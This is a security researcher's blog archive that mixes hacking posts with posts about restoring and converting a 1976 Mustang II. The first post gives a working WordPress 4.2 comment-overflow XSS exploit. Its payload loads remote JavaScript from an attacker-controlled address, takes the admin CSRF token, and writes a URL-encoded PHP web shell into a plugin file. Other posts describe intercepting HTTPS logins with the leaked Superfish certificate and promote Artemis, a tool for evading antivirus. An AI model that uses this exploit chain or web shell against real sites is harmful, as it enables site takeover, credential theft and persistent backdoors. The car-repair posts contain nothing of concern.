Author Archives: 0sm0s1z

About 0sm0s1z

Matthew Toussain (0sm0s1z) is a computer security professional. When not actively defending the nation’s networks from rampaging cyber pandas; he can be found tinkering with hacking tools, or speaking at any conference where he can find an audience. Between coding Subterfuge and developing/commanding the U.S. Air Force Academy’s Basic Cyber Competency Course, which now trains over 400 students per year, it would be a wonder if he had time for anything less nerdy in his life. Since he doesn’t, he spends the remainder of his time participating in national and international cyber competitions such as iCTF, CSAW, CCDC, and SANS NetWars. Matthew was a guest speaker at the 20th Anniversary of DEFCON, the largest security conference in the world, and a member of the only undergraduate team ever to become the overall winners in the NSA’s Cyber Defense Exercise defeating all contenders including the Air Force Institute of Technology. He lives in Biloxi, MS with a multitude of Cisco switches. His secondary passions include the piano, guitar, violin, and running. He has yet to figure out a way to mesh them together, but when he does it’s gonna be big.

WordPress 4.2 Comment Field Overflow Exploit

While far from unique, the recent vulnerability in the WordPress 4.2 comment system is exceptionally egregious. The vast majority of WordPress attacks effect user installed plugins. Though these plugins often receive wide usage exploitation of associated vulnerabilities is limited to those users who individually added this content to their site. This vulnerability comes packaged with the default WordPress build.

What’s the big deal?

WordPress is the most popular blogging system in the world, and is used by over 60 million websites. The WordPress Content Management System (CMS) is so popular that it often sees usage on more then just blogs, yes even e-commerce sites. 23.3% of the top 10 million websites are WordPress, and unless these sites disabled the default comment system or installed an alternate comment plugin they are ALL vulnerable.

WordPress released an emergency patch for this vulnerability. If automatic updates are allowed the patch is pushed with 4.1.4. Alternately, upgrading WordPress to version 4.2.2 resolves this issue.

Comment Field Overflow Vulnerability

The vulnerability was discovered by Jouko Pynnonen and exploits a stored Cross Site Scripting (XSS) flaw. Effected software packages:

  • WordPress 4.2
  • WordPress 4.1.2
  • WordPress 4.1.1
  • WordPress 3.9.3

The bug itself is a result of a MySQL database limitation for very long posts. When WordPress stores the content of these uber long comments in the database MySQL truncates the result. This means that the closing tags in an HTML field like <a title are lost when the comment is loaded into the database. mysql-snip

Contents of the mysql database once the comment has been truncated and inserted

Theoretically, the truncation would break the tag rendering the XSS invalid. As a result WordPress fails browser-fix2to filter the content. In practice, however, while WordPress certainly fails to filter the dangerous content the user’s browser is much more helpful.

Because HTML is such a versatile language adherence to best practice coding syntax is not… universal. As a result browsers attempt to automatically fix coding issues like broken tags. The browser (tested in Chrome and Firefox) will add in an enclosing </a> tag as seen in the source code shot pictured.

And that gentlemen, is code execution. Now for the fun part, getting a shell!

Proof of Concept Alert

The proof of concept exploit below can be used to determine whether a site is vulnerable.

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Screen Shot 2015-05-16 at 6.54.02 PM

Executing Arbitrary Javascript

In order to fully leverage this attack we need to gain the ability to execute arbitrary JavaScript. This can be accomplished by hosting an external .js source file and using eval() embedded in an onmousover event against the target. See below:

<a title='xxx onmouseover=eval(unescape(/var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.setAttribute%28%27src%27%2C%27http%3A%2f%2f10.0.0.184%2fexploit.js%27%29%3Bdocument.head.appendChild%28a%29/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Escalating To Shell Access in WordPress

Now that we have the ability to execute arbitrary remote JavaScript on the target we need to come up with a snazy way to use it! In WordPress an Administrator can use the builtin plugin editor to modify installed plugins. This effectively means: there is a page on the site that takes POST requests with PHP code!!!! Hint: The page is called plugin-editor.php

Using the xmlHTTPRequest() AJAX library we can make post and get requests with JavaScript. We first make a get request to a random page to get an admin csrftoken. The next step is to pull the token out of the HTTP response data and replay it to the plugin editor along with our payload. In this case I urlencoded my personal PHP shell (because I know the code and like it better than c99 and others). You are welcome to use it if you want, use the urldecoder here and the source below if interested. Alternately, you could just urlencode a PHP meterpreter and browse to the location whenever you are in need of a session.

Note: This attack overwrites one of the WordPress default plugins. I like to use akismet/akismet.php because it is installed be default and performs a useful function (as opposed to the hello dolly plugin, which I typically delete on my personal WordPress installs).

function get(url)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "GET", url, false );
    http.send( null );
    return http.responseText;
}


function post(url, csrftoken)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "POST", url, false );
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("_wpnonce=" + csrftoken + "&_wp_http_referer=/wp-admin/plugin-editor.php?file=hello.php&plugin=hello.php&newcontent=78%3C%21-----------------------------------------------------------------%0A%09%09%090sm0s1z%0A%0AThe+Purpose+of+this+file+is+to+act+as+a+Remote+File+Inclusion+vector+to+exploit+a+web+page+through+a+Persisten+Vulnerability.%0A------------------------------------------------------------------%3E%0A%0A%3Chtml%3E%0A%3Ctitle%3EH4X0R3D%3C%2Ftitle%3E%0A%3Chead%3E%0A%0A%3C%21------------------------------%0Awanna+put+some+javascript+here%3F%0A-------------------------------%3E%0A%0A%3C%2Fhead%3E%0A%0A%3Cbody%3E%0A%0A%3C%21---------------------------------------------%0APHP+Terminal%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETerminal%3A%3C%2Fh3%3E%0A%0A%0A%3Cform+method%3D%22post%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22%3E%0A0sm0s1z%3E%3Cinput+type+%3D+%22text%22+name+%3D+%22cmd%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27cmd%27%5D%29%29%0A%7B%0A%0A%0A%0Aecho+%27%3Cpre%3E%27%3B%0A%0A%24cmd+%3D+%24_POST%5B%27cmd%27%5D%3B%0A%0A%24last_line+%3D+system%28%24cmd%2C+%24retval%29%3B%0A%0A%2F%2F+Printing+additional+info%0Aecho+%27%0A%3C%2Fpre%3E%0A%3Chr+%2F%3ELast+line+of+the+output%3A+%27+.+%24last_line+.+%27%0A%3Chr+%2F%3EReturn+value%3A+%27+.+%24retval%3B%0Aecho+%27%3Chr+%2F%3E%27%3B%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%3C%21---------------------------------------------%0APHP+File+Upload+With+Directory+Selection%0A----------------------------------------------%3E%0A%0A%3Ch3%3EFile+Upload%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type%3D%22hidden%22+name%3D%22up%22+%2F%3E%0AChoose+a+file+to+upload%3A+%3Cinput+name%3D%22uploadedfile%22+type%3D%22file%22+%2F%3E%3Cbr+%2F%3E%0AFile+Path%3A%3Cinput+type+%3D+%22text%22+name+%3D+%22path%22+%2F%3E%3Cbr+%2F%3E%0A%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27path%27%5D%29%29%0A%7B%0A%0A%0A%24target_path+%3D+%22%22%3B%0A%0A%24target_path+%3D+%24_POST%5B%27path%27%5D%3B%0A%0A%24target_path+%3D+%24target_path+.+basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29%3B+%0A%0Aif%28move_uploaded_file%28%24_FILES%5B%27uploadedfile%27%5D%5B%27tmp_name%27%5D%2C+%24target_path%29%29+%7B%0A++++echo+%22The+file+%22.++basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29.+%0A++++%22+has+been+uploaded%22%3B%0A%7D+else%7B%0A++++echo+%22There+was+an+error+uploading+the+file%2C+please+try+again%21%22%3B%0A%7D%0A%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%3C%21---------------------------------------------%0AVulnerability+Test+Box%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETest+Vectors+Here%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type+%3D+%22text%22+name+%3D+%22test%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27test%27%5D%29%29%0A%7B%0A%0A%24test+%3D+%24_POST%5B%27test%27%5D%3B%0A%0Aecho+%24test%3B%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%0A%0A%0A%3C%21---------------------------------------------%0AInclusion%0A----------------------------------------------%3E%0A%0A%0A%3Chr+%2F%3E%0A%3Cpre%3E%0Ainject%3A%09++%09+include%28%27mysite.php%27%29%3B+%3Cbr%3E%0ATo+exploit+Remote+File+Inclusion+Vulnerability%0A%3C%2Fpre%3E%0A%3Chr+%2F%3E%0A&action=update&file=hello.php&plugin=hello.php&scrollto=0&submit=Update+File");
    return http.responseText;

}

var page = get("/wp-admin/plugin-editor.php?file=akismet%2Fakismet.php&plugin=akismet%2Fakismet.php");

var regExp = /name=\"_wpnonce\"\svalue=\"([^)]+)\"/;
var matches = regExp.exec(page);
var csrftoken = matches[1].slice(0, 10);

post("/wp-admin/plugin-editor.php", csrftoken);

The WordPress 4.2 Comment Exploit

I wrote a Metasploit module to trigger this vulnerability:

https://github.com/0sm0s1z/WordPress-Comment-Overflow

session

The Patch

WordPress patched this flaw by disabling long comments…. Well Done….

wp-patch

Conclusion

Hopefully this post was an interesting read! If you have any thoughts on the WordPress 4.2 Comment Exploit, my Metasploit module, or a suggestion/topic you’d like covered let me know in the comments below. FYI I use Disqus, sorry :)

Further Reading:

[1] https://blog.sucuri.net/2015/04/critical-persistent-xss-0day-in-wordpress.html
[2] http://arstechnica.com/security/2015/04/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/
[3] http://thehackernews.com/2015/04/WordPress-vulnerability.html
[4] http://klikki.fi/adv/wordpress2.html
[5] https://core.trac.wordpress.org/changeset/32311/branches/4.2/src/wp-admin/includes/upgrade.php

Exploiting Superfish with Subterfuge

superfish

Let’s talk about the Internet. What do you use it for? banking, social networking, private email, registering your car, maybe even your taxes? When you’re using the web to accomplish these somewhat standard tasks you are almost invariably predicating the security of your interactions on HTTPS. Here’s funny thing about HTTPS though, it requires TRUST.

Typically, that trust is vested in a verified third-party like Comodo Inc. Now while this third party may or may not be trustworthy, at least you can be confident that all of your eggs are NOT in the same basket right? RIGHT!?

Unfortunately, if you are the recent owner of a Lenovo computer not only are all of your eggs in the frying pan, but anyone can reach over and dump them into the fire at will! How did this happen?

Using the Superfish Root CA

The integrity of HTTPS communications is seated in the certification authority trust model. In order to inject “targeted ads” into your browsing experience Lenovo had to break the foundation of that security model. Superfish, their solution to this quandary, functions by adding a root certificate authority to your computer. It then spies on your encrypted Internet traffic… not cool!

Screen Shot 2015-03-01 at 6.16.14 PM

What’s worse as an attacker you can retrieve Superfish’s certificate! That means that I can spy TOO! Robert Graham did an outstanding writeup on the steps he took to retrieve the certificate: http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html

I further removed the certificate passphrase and added it into Subterfuge in order to demonstrate just how trivial it is to exploit this vulnerability. Click the start button… wait for bank creds… really Lenovo? This kind of perversion of their customer’s trust isn’t simply bad business, it’s unethical.

Subterfuge 1.0.1

In order to facilitate attacks on Superfish we just released an exceptionally raw update to Subterfuge. In this update the toolkit moves away from SSLStrip-based proxying of web traffic to MITMProxy-based handling. So… what exactly does that mean?

1. Subterfuge can now MITM SSL sessions using arbitrary certificates

2. SSLStriping can be selectively enabled or disabled as desired

Installation

This package is an update to existing Subterfuge installations as opposed to a stand alone version.

To download the Subterfuge version 1.0 installer click here. (This version of Subterfuge does NOT include Superfish attack support).

To download the version 1.0.1 update package click here.

Version 1.0.1 now requires MITMProxy. To install MITMProxy on Kali Linux (or other debian based linux variants) run:

sudo -s
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
apt-get install build-essential python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev
pip install mitmproxy

Upgrading Subterfuge

This requires that Subterfuge version 1.0 be installed on the system already for instructions on accomplishing this see: http://kinozoa.com/blog/installing-subterfuge-on-kali-linux/

Uncompress the latest version of Subterfuge into your existing installation directory as shown below:

tar -xvf subterfuge_1.0.1.tar.gz /usr/share/

Configuring Subterfuge to SSL Intercept

Settings Page

  1. Set Proxy Mode: MITMProxy
  2. Apply

Screen Shot 2015-03-01 at 5.16.28 PM

Executing the Attack

At this point attacking with Subterfuge commences as usual. Please note that this is a bleeding edge release of the framework and has not been tested to ANY degree. That means it is likely to be buggy, or not produce expected results consistently. Please use the comments below to describe any issues you are having, and we’ll do our best to get them fixed up and packaged into a more official release… (2.0 fingers crossed).

References

MITMProxy: https://mitmproxy.org/doc/index.html

Slate: http://www.slate.com/articles/technology/bitwise/2015/02/lenovo_superfish_scandal_why_it_s_one_of_the_worst_consumer_computing_screw.html

Repairing Rust Damage with Fiberglass

My ride originally comes from Pennsylvania. As a result it has an ATROCIOUS rust problem. Fortunately, it doesn’t look like any of the rust directly impacts the structural integrity of the vehicle. After removing my hood and fenders I was able to see the full extent of the damage. I decided to fix the damage by bonding fiberglass directly to the vehicle unibody.

Tools Used:

  • Hammer
  • Flathead screwdriver
  • Metal Snips
  • Orbital Sander
  • Super cheap paintbrushes (They turn into plastic after you’re done)
  • Latex Gloves
  • Respirator

Materials:

 

20141004_150731

Liberal application of a hammer, flat head screwdriver, metal snips, and my orbital sander gave me a good look at what exactly needed repairing.

The most significant damage was under my driver’s side fender. I had to remove a fair amount of metal in order to eliminate all of the rust spots.

 

 

 

 

 

 

 

 

 

 

20141004_15075020141004_212931

Other damaged areas included the engine compartment frame that my fenders were bolted to and the floor on the drivers side. And yes I could stick my hand right through the bottom of my car and touch the road!

 

 

 

 

20141004_212955

 

There was also some corrosion damage around the battery compartment that needed patching.

 

 

Patch Management

The first step was to prep the regions. Affixing my handy dandy respirator I mixed fiberglass resin with MKP (catalyst) in order to start the clock. The resin is very sticky, but starts to harden within 3-5 minutes. I coated the problem areas liberally. By the time I’d gotten through coating all of the areas the places I started at had already gotten tacky.

Tacky – Fiberglass resin is said to have gone “tacky” once it is no longer wet and gloppy like an oil-based paint, and is holding its position. At this point the resin is very sticky (like glue). Once it has dried and is no longer sticky, it ceases to be “tacky”.

20141005_141618

Once the resin became tacky I added my first layer of 6oz fiberglass cloth. You can technically add resin to any type of cloth in order to form a solid part. The most common materials are:

Fleece/Cotton/Other Crap – Fleece or cotton are common base materials used in DIY composite construction due to their high availability and low price they lack the strength of more advanced fabrics.

Carbon Fiber – Carbon fiber is super cool, super light, super strong, and super expensive. It is also relatively hard to come by when compared to other fabrics, but it looks sick!

Kevlar – Kevlar is very strong, but it is also extremely heavy when compared to other fabrics.

Fiberglass – Fiberglass comes in two general flavors: fiberglass mat and fiberglass cloth.

Fiberglass Mat vs Cloth – The general difference is price and finish. Mat has a much more course grain and is often used in the construction of temporary parts like molds for future fiberglass work. Cloth is more expensive, but it has a denser weave and can be more easily sanded to a pristine finish. Since fiberglass is not overly expensive I chose to use it as my learning material (as opposed to expensive carbon fiber). I’m using 6oz fabric (fiberglass fabric is differentiated by the weight (oz) of the material).

The next step was to coat the fiberglass with another layer of resin in order to set it appropriately.

20141004_21294620141004_21291320141005_14173720141004_212924

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Depending on the location I laid down between 3 and 4 layers of fiberglass.

 

Sanding

20141005_153331

 

 

 

Before applying paint I sanded the patches smooth.

 

 

 

 

Finishing Touches

20141005_164215Finally, I added a layer of paint and let the sucker dry!

 

I’m really happy with how these repairs turned out. The fiberglass is extremely strong (I tested it with my hammer).

 

In making these repairs minimal weight was added to the vehicle. I didn’t have to purchase expensive welding equipment. The project only took a couple days despite my lack of experience with this type of work.

 

 

 

 

 

Let me know what you think or if I left out some obviously crucial detail that you’d like to be regaled with. Yanking the engine out was a load of fun!

20141005_184753

Engine Compartment Cleaning

This took a LOT of scrubbing! Followed by painting. Rust was a very significant concern so I spent a lot of time sanding the sucker down and then repainting in order to mitigate long term wear and tear as much as possible.

Tools used:

Rust-Oleum 7582838 Professional Primer Spray Paint, Gray Primer, 15-Ounce

Rust-Oleum 239107 Professional Spray Paint, Semi-Gloss Black, 15-Ounce

After scrubbing I put down a couple coats of primer

primed

Next a couple coats of paint, and she cleaned up nice!

painted

Trippin’ on Dat ICE

It’s time to ditch my greasy old Internal Combustion Engine (ICE)! My Mustang II is currently running a 1976 2.3L v4 carbureted hunk of scrap metal. That’s not to say I’ve got anything against a carb, having that over fuel injection would certainly have solved some of the recent trouble I’ve had with my other car, but… a v4? In a Mustang? Nope, goin ‘lectric!

I bought an Impact Tool to help me pop the nuts off of the rig, but I found that most of the time I only had the room to use a plain old wrench. Getting this hunk of junk was a total pain that included me standing on the engine itself and trying to deadlift some of the bolts loose. Slippage? Let’s just say that I have about a hundred bruises.

Lesson learned during this sprint: ??? Wrenches suck…

CloseUpandOut

Tools used:

  • Ingersoll Rand 236G 1/2-Inch Edge Series Air Impactool, Silver
    • English Driver Set (Stanley)
    • Metric Driver Set (Stanley)
    • Impact Joint Set
  • Wrench Set
  • Ratchet Set 12mm – 23mm (needed english set not metric, old Fords…)
  • Couple Buckets
  • Car Jack
  • 2 Jack Stands
  • Cherry Picker/Engine Hoist
  • Air Cutoff Tool (had to cut through some of the bolts on my exhaust piping, was epic fun!)

The motor before I started turning wrenches

TheICE

Started by jacking the vehicle up. I was afraid of the jack stand’s stability for a while, but after jumping on the engine block for hours on end I managed to develop a modicum of bravery. It certainly looks precarious though. Ya, I was under that!
Jacked

Hours of tugging on wrenches, draining oil, and smashing things with my hammer out of frustration (not on the parts list) later…

Lift!

I wrapped trucker chains around the motor in order to get it out. Unfortunately I stripped the heck out of the bolts on the exhaust system so I couldn’t disconnect it. You can see it hanging off in the picture below. In order to rectify that I had to cut the bolts tying it together underneath the car. That allowed me to raise the motor as high as seen in the photo, but the exhaust pipe was still to long to go any further. Fortunately, getting the engine out this far allowed me to get a better angle on the nut and my air impact tool was able to spin it write off. That sucker was money very well spent. Glad I went with the higher-end IR. It was on sale on Amazon too, $77 bucks! At the time of this posting it was back up to $100 with MSRP at $130. so definitely happy with my timing.

Exhaust Trouble

Finally loose!

Out

Motor out and engine compartment cleaned up a bit.
OutnTouchedUp

This next part of the project is actually for the next phase (installation of the electric motor), but it shows the engine bay cleaned up and painted so I figured I’d throw it in.cleanAnyway! Let me know what you think or if I left out some obviously crucial detail that you’d like to be regaled with. Yanking the engine out was a load of fun!

 

Mustang Project – Week 1

Much tinkering was done. This week I placed an order for an [ingersol rand impact drill and the associated hardware]. While waiting for that, I began work on the vehicle body. I started fabricating the front bumper (note I’m building the chin spoiler separately). I completed the bumper’s shell and should only have to reinforce/layer the part in order to get it into working shape. I also removed the radiator and began shaping the hood.

Lesson learned this  week: fiberglass burns! Don’t dump it on yourself (it also turns your jeans into plastic)

Tools used this week:

  • Dewalt Power Drill
  • Orbital Sander
  • Fiberglass Kit
    • Respirator
    • Fiberglass cloth (6oz)
    • Bondo Resin
    • Cheap Brushes
    • Fiberglass Roller
    • Latex Gloves
  • Molding Clay (terra cotta)
  • Insulation (blue) foam
  • Various Screws

The Endeavor

Fiberglass’d

I began by ripping the bumper off with a ratchet. I think it’s safe to discard. It looks bad, is heavy, and I’m not sure it’s structurally necessary. The front pegs it was attached to are still there providing support. Furthermore, once I remove the engine, the engine compartment won’t need as much protection… I think. Anyway it will look cool!

bumper

Next I began work on the replacement bumper. Originally, I wanted to build the whole thing out of clay to form the mold, but that turned out to be prohibitively heavy. The bumper came apart under its own weight, dang gravity!

For my next attempt I purchased [insulation foam] from Lowes. I used this with my [power drill] and some hardware to build the shape. I then sanded it down to allow the clay to better grip the surface. Finally, I covered the thing in clay to form the final shape.

clay_bumper

I now covered the thing in aluminum foil, waxed the foil with a mold release, and applied resin. Next I chopped up the fiberglass cloth and began layering it. I waited for the first layer to be about halfway dry before adding the second, and I applied additional resin after each layer. I only layered it twice for now to give the piece a semi-rigid form but will add additional layers to get the part to where I want it.

Bumper_Fiberglass

The final step will be to sand it until happy. I’m also not sure what it will look like until after I add the chin spoiler so I intend to fabricate that before going much deeper into the weeds on the bumper itself.

Other Work

I ripped out the radiator:

under_the_hood

And I began working on the hood mold:

clay_hood

Alright! That’s all for this week. Next week I should be receiving my air drill, and I intend to buy an engine hoist. The plan is to finish the hood, drain the engine, and get the engine out! Lots of work gotta get ‘er done!

Mustang II Conversion – The Body

In this second post about my 1976 Mustang II project I’m going to discuss the vehicle’s body, and the modifications I either have to or want to make to it. Most people hate it, but the 70s Mustangs are my favorite in the long line of pony cars. Whilst trolling the Internet for sexy hot rods, I stumbled upon this saliva inducing beauty put together by the folks at A-Team Racing. I’m using that vehicle as the reference and target for my own project. Note that not only do I have absolutely NO experience working on cars or with composites, but I also do expect to spend most of my time stepping on my tail and failing. Best way to learn right? At least I’m realistic…

Conversion

Rough Design

The vehicle I’m starting with has some significant bodily differences from my target so I did a quick mockup of what the vehicle should look like before and after. This allowed me to really get a feel for how large the project I’m taking on actually is. It’s pretty big…

Slide2Sorry the bottom image didn’t scan well. I’ll try to spruce it up in the future.

You’ll notice that the biggest issue is that hatchback problem. My donor vehicle is a notchback, not cool. The part that I’m most worried about there is the glass. I intend to fabricate the rear panel out of fiberglass and use a lexan sheet for the window. I think I can drill holes through these layers and bolt them together, then grind off the bolts and fiberglass over top of them to get a smooth finish.

Fabrication Plan

The basic idea is to pull off most of the body panels and replace them with fiberglass replicas. This allows me to cut weight while also giving me the opportunity to adjust the vehicle’s appearance to better suit my ego.

Here’s the general layout of my plan:

  • I will be using foam to build the general shape of the body panels
  • I plan to overlay that with clay in order to mold a more defined shape
  • Next I will cover that with aluminum foil and spray it with a releasing solution
  • Then I plaster fiberglass on top of that and let it harden into the part
  • After reinforcing the piece I should be done

In some cases I may have to take the positive and pull a negative form off to get the actual desired shape, but that is generally speaking what the process should be to build virtually every part of the car… I hope…

Let me know where the wrinkle is in my plan! No, it’s not the whole plan, Jeez!

Mustang II Restoration & Conversion

I’m beginning a new project and this one is a touch out of the ordinary for me. I know absolutely nothing about cars, but I’m going to be taking an old 1976 Ford Mustang II, modernizing it, restoring it, and converting it to electric power or die trying.

My first objective is to establish the technical requirements for my project. The purpose of this vehicle, once built, is going to be taking me to and from work on a daily basis; however, I would like to maximize the vehicle’s acceleration where possible in order to yield a more pleasurable driving experience.

1310-1978-mustang-ii-evolution

Dialing in the Project Requirements

My daily commute is 16 miles each way. I want to have at least a 30% mileage buffer but would prefer a 50-60% buffer due to additional battery drain caused by auxiliary systems like HVAC, the stereo, power steering, etc. This all totals out to:

Range Calculation:

Screen Shot 2014-09-14 at 9.19.49 AM

This means my minimum range is 42 miles, and my target range is between 48 and 52 miles from. The next step is to determine how much power it will take to drive my car each mile. This metric is known as Watt-hour per mile or Wh/mi. This number can be extremely difficult to determine prior to producing the finished product. It is further muddled by the driving efficiency over speed curve. That is to say my base requirement is a function of the vehicles weight and aerodynamics, but my electric motor will also have a different efficiency based on the speed I am traveling at and the gear ratio of the vehicle’s transmission/rear axel. This means that I have to begin making assumptions and over-engineering my system in order to develop an adequate product.

The most important controllable variable in this equation is the vehicle’s weight. 1973-1978 Ford Mustangs had a gross curb weight of anywhere between 2600 and 3400lbs based on the year model and trim package. By ditching the major vehicle components required for an internal combustion engine (ICE), we shed a bunch of the car’s flab. My donor car is a 1976 notchback body style 2.3L v4. This makes it a muscle car wussy! Fortunately for me, it also makes it one of the lighter Mustang IIs weighing in at 2600lbs. The vehicle also suffers from some rust and is in need of a facelift so I will be constructing my own paneling out of fiberglass and carbon fiber. These modifications should allow me to shed additional weight over the existing sheet metal.

Component Weight
Engine 400
Exhaust System 200
Fuel Tank 50
Sheet Metal 150
Total 800lbs
New Weight 1800lbs

This is of course just the vehicle’s weight without the new electric drivetrain and batteries to propel it forward. Once I factor those pieces in the car will be much heavier, though still lighter then it was as a stock ICE. Since we won’t know how much battery we need until we solve for wh/mi and we need the to know vehicle performance data in order to calculate that we will make some assumptions. Wh/mi for most light vehicles tends to be around 250-300 and for small trucks it is 350-400. I was able to find that amp draw for a small miata is 90amps at 50mph. We will use this number as our low end. For our high end, since the Mustang II will be much heavier we will assume 170amps at 70mph. For all of these calculations we will assume a 144V battery system, though our file setup might differ. We’re just eyeballing and overestimating here.

Range Calculation:

Screen Shot 2014-09-14 at 8.52.25 PM

The last thing we need to do is solve for our power requirements. In order to preserve the lifespan of our batteries we must factor in a depth of discharge (DoD) limit. If we deplete our cells by greater then 80% it will greatly shorten the life expectancy of the EV. This means that we will need an additional 20% on top of our power requirements. For this conversion I will be using lithium ion batteries (LiFePO4). However, if using lead acid batteries it is important to also factor in the Peukerts effect. This effect causes lead acid to output at only 55% efficiency meaning that we need almost twice as much power for the same effect. All right! Power is in watts so let’s solve for it!

Power Requirements:

Screen Shot 2014-09-14 at 9.24.22 AM

Value Power Requirement DoD Factored
Minimum Power @ 50mph 10811.84 12974.208
Base Target Power @ 50mph 12475.2 14970.24
Top Target Power @ 50mph 13306.88 15968.256
Minimum Power @ 70mph 16219.84 19463.808
Base Target Power @ 70mph 18715.2 22458.24
Top Target Power @ 70mph 19962.88 23955.456

This means that peak power for my rig is 24,000 kW. Now it’s time to take a look at equipment and gauge the kind of power I am going to see.

EV Setup

I want my “muscle” car to handle with the same level of growl you would expect out of a small block v8 like the 302s Mustangs are famous for. A little bit of tire squeal is appealing, especially on a bad day! In EV speak we have a couple values to work with. What is somewhat counter intuitive, is that they are each predominately controlled by different components of the car. That means that horsepower isn’t as simple as a big motor.

Value Result Control System
Volts (V) Horsepower (Top Speed) Battery Pack -> Motor Max
Amperage (A) Torque (Acceleration) Motor Controller
Amp hours (Ah) Range Battery Pack

 

An electric car is a system. High voltage means high top speed, but only if both your motor controller and your electric motor can support it. Your controller can always output the max amperage it is rated for; however, the voltage sag that it can place on your batteries if they aren’t rated for it can be catastrophic. What is similar to an ICE vehicle is that the more fuel (Amp/hrs) you pack into it the farther it can go in one straight shot.

I found that I could get a really good deal on certain pieces of equipment by buying used. Since EV components are typically rated to work for a long time without breaking I felt safe buying certain parts like the motor and controller second hand. The current rig I am planning to build with associated specs is:

Parts List Specs Notes
NetGain WarP 9 Motor 156V continuous Should handle like a small block v8 when fed properly
Manzanita Zilla 1KHV 1K Amps/300V HV controller is powerful enough to handle dual WarP 9s if I upgrade in the future
PWN Real Force 3.2V 100AH/170V Not sure about these yet…

Reading around online I’ve found that the WarP 9 should be able to run at 170V fairly stably given that it is still run within its holistic power guidelines. The controller is also capable of adjusting the true voltage/current seen by the motor thereby shielding it from the battery pack. This means that as long as my pack is not over 300V it should be within limits, but in order to hit near max voltage for the WarP 9 (to maximize the top end speed) I will need to be careful about choosing batteries with too much AH opting instead for higher voltage (more on this in a future post).

OMG!!! What did I sign myself up for!

That is the general details regarding my conversion project. I decided to just jump right in and start working on this car because I’d otherwise never actually get around to it. The most difficult part of the project might not actually be the EV conversion. I have three major goals in mind:

  1. Make a cool electric car
  2. Make said car actually look cool too
  3. Create a sick car computer system to jam out and hack the planet!

I’m not too worried about that last part… it’s my forte; however, that second bullet might give me some trouble and will be the focus of my next post. I want to make the whole thing look very different than stock. This is going to involve a LOT of fiberglass and carbon fiber fabrication work! I have NO idea what I’m doing, but I can’t wait to get started! I’m glad to have you along for the ride. Please comment below if you have any questions or want to provide suggestions/encouragement. Most importantly please comment if you think I’m and idiot and have a better idea or a flaw to point out! You’re dumb and this is why are the best comments out there!

2014-09-14-2

P.S. Sorry about the exclamation marks… I get excited

Accelerate your Attack with Artemis

It is widely acknowledged that antivirus is not an effective security mechanism against 0-day threats. It is not until malware has been out in the wild propagating for a while that it catches a vendor’s eye and a signature for it is developed. Once that happens it is trivial for a malicious actor to modify his source code while preserving the functionality of his tool, and then the process starts all over again. Unfortunately, for the penetration tester this means that each one of us must have our own individual solution to the antivirus problem in order to give our clients the value they deserve out of an information security assessment. After all, if the bad guys are doing it, it MUST also be a part of our security evaluation procedures. Penetration testers should not have to spend their time bypassing a security mechanism that other less ethical hackers would simply vaporize. We built Artemis to solve this deficiency.

cevincereArtemis is an advanced malware simulation suite capable of emulating the Advanced Persistent Threat. Artemis raises the bar allowing ethical hackers and penetration testers the luxury of an advanced set of features equivalent to many of the tools employed by criminal gangs today. By abstracting polymorphism to a server based platform at cevincere.com Artemis is able to stay one step ahead of antivirus vendors, and ensure that penetration testers can give their clients the value that they deserve.

How Artemis Bypasses Antivirus

Cevincere uses several techniques to generate a unique binary in order to bypass antivirus. Because Artemis’ signature is vastly altered each time it is created AV is unable to create an effective signature.

Features

  • Evades signature-based anti-virus detection
  • Integrates with free tools like the Metasploit Framework & Armitage
  • Robust communication channel maximizes connectivity
  • Increases stealth by dialing back on a customizable interval

I hope that Artemis is able to help you push your penetration tests to the next level! The video below is a short demonstration of how Artemis may be able to assist you. Happy Hacking!

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

